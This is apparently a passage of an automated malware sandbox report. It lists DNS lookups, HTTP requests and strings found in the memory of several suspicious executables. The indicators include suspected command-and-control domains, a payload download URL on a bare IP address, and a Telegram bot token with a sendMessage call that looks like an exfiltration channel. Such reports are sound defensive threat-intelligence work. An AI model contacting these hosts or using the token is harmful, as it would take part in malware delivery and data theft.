day\"],[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[],{\"google:clientdata\":{\"bpc\":false,\"tlw\":false},\"google:groupsinfo\":\"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\\u003d\",\"google:suggestdetail\":[{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002}],\"google:suggestrelevance\":[1257,1256,1255,1254,1253,1252,1251,1250],\"google:suggestsubtypes\":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],\"google:suggesttype\":[\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\"]}]"}}chedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340886957835794","type":2,"window_count":0},{"crashed":false,"time":"13340886960923866","type":0},{"did_schedule_command":true,"first_session_service":true,"tab_count":1,"time":"13340886965177921","type":2,"window_count":1},{"crashed":false,"time":"13340890857002147","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340890857032656","type":2,"window_count":0},{"crashed":false,"time":"13340890860222296","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340890860225507","type":2,"window_count":0},{"crashed":false,"time":"13340890862208495","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340890862220490","type":2,"window_count":0},{"crashed":false,"time"

Source: global traffic	DNS traffic detected: DNS query: pancakedipyps.click
Source: global traffic	DNS traffic detected: DNS query: cheapptaxysu.click
Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fivetk5sb.top
Source: global traffic	DNS traffic detected: DNS query: fivetk5sb.top
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic	DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic	DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic	DNS traffic detected: DNS query: fieldhitty.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 22 Dec 2024 01:16:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vlDZeF9DSsj%2Fah99ZkjP8hZIUWe5uI49e4RkUM5kg%2BD2%2Fhbyj2xSFtBXOyVLqtRH%2BlxjFeJe91Urc6S0cUS%2Fis30X9e8l1t6U%2FzeUl4z9RJDyZJ4CnR6TpNjJB%2FizkzD7gTGMX0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f5c4474fce34328-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 22 Dec 2024 01:18:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6SSQSxv7PYjbu6zdvJ61%2FOvdzgJVvlHWxFLuiiY6PRfx2TI4q0Ktga0pdm1WdZgB%2BdVlBJbih4%2BYSeVsQ8B9h8KuG4vRFJqXTkwx4BtA3uPP%2FemmxuUhyVnLCO%2B8avts6eD46%2Bc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f5c47d80cdb4385-EWR

Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: http://.css
Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: http://.jpg
Source: c9d0f96e57.exe, 0000001F.00000003.3795841933.000000000595C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download
Source: c9d0f96e57.exe, 0000001F.00000003.3768476028.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3795841933.000000000595C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadGF
Source: c9d0f96e57.exe, 0000001F.00000003.3680983757.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3736647835.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3711012668.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3655522323.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3768476028.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3795841933.000000000595C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadKFo
Source: c9d0f96e57.exe, 0000001F.00000003.3736647835.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3711012668.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3768476028.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3795841933.000000000595C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloaduFi
Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB17
Source: b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
Source: b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
Source: b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY
Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: fed209a298.exe, 00000018.00000000.3107118176.0000000000423000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: cd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cc6f25572f.exe, 00000011.00000003.2765724677.000001D6698FC000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766911611.000001D6698FC000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: cc6f25572f.exe, 00000010.00000002.2886690972.000002B0C3880000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2917808778.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919515707.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919171490.000001D66990D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/
Source: cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1AF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o
Source: cc6f25572f.exe, 00000011.00000002.2919515707.000001D669972000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270
Source: cc6f25572f.exe, 00000010.00000002.2888013323.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000010.00000000.2731872890.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2972181574.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://api.telegram.org/botFailed
Source: cc6f25572f.exe, 00000010.00000002.2886690972.000002B0C3880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/f)i
Source: cc6f25572f.exe, 00000010.00000002.2886690972.000002B0C3880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/n)a
Source: cc6f25572f.exe, 00000011.00000002.2919171490.000001D66990D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/ogle
Source: cd2469328d.exe, 0000000B.00000003.2663747077.0000000003531000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3652093995.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: 5cda6c90d7.exe, 0000000C.00000003.2766963059.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2800855972.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838754343.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2802169090.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2795190281.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2767444886.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&k
Source: cd2469328d.exe, 0000000B.00000002.2793903700.0000000003530000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3652093995.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: cd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: cd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 5cda6c90d7.exe, 0000000C.00000003.2795190281.0000000005E41000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2800638240.000000000181A000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000002.2870509764.0000000001789000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838471636.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2659546736.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2766424937.0000000005E47000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2859043534.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2659069201.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2860709107.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815170543.000000000181B000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000002.2872169437.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2767444886.0000000005E46000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2801888516.000000000181D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cheapptaxysu.click/
Source: 5cda6c90d7.exe, 0000000C.00000003.2800638240.000000000181A000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838471636.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815170543.000000000181B000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2801888516.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2774023966.000000000181A000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2773670606.0000000001810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cheapptaxysu.click/%
Source: 5cda6c90d7.exe, 0000000C.00000003.2659442912.00000000017A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cheapptaxysu.click/33
Source: 5cda6c90d7.exe, 0000000C.00000003.2838471636.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815170543.000000000181B000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2801888516.000000000181D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cheapptaxysu.click/E
Source: 5cda6c90d7.exe, 0000000C.00000002.2870509764.00000000017B9000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2814852148.000000000182D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838471636.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2860832487.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2659546736.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2859043534.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2659069201.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2860709107.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815170543.000000000181B000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838873029.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000002.2872096119.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000002.2872169437.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2801888516.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2774023966.000000000181A000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815170543.000000000182D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838471636.000000000182D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2773670606.0000000001810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cheapptaxysu.click/api
